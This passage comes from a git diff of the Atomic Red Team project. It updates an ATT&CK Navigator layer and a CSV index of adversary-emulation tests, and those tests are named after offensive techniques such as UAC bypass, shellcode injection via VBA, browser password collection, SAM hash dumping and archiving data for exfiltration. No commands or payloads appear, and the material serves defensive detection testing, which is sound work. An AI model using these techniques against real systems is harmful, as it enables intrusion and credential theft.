:true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 7ae3b587..c6f0fcb8 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -10,14 +10,14 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell +privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -49,7 +49,9 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh @@ -63,6 +65,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell @@ -156,6 +159,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell @@ -182,6 +186,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt +credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt @@ -228,20 +233,51 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell +collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell +collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt +collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt +collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt +collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt +collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh +collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh +collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh +collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh +collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell +collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt +collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell +collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell +collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt +collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt +collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell +collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash +collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell +collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell +collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash +collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell +collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell +collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell +collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash +collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell +collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell +collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash +collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash +collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash +collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash +collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt defense-evasion,T1027.001,Binary 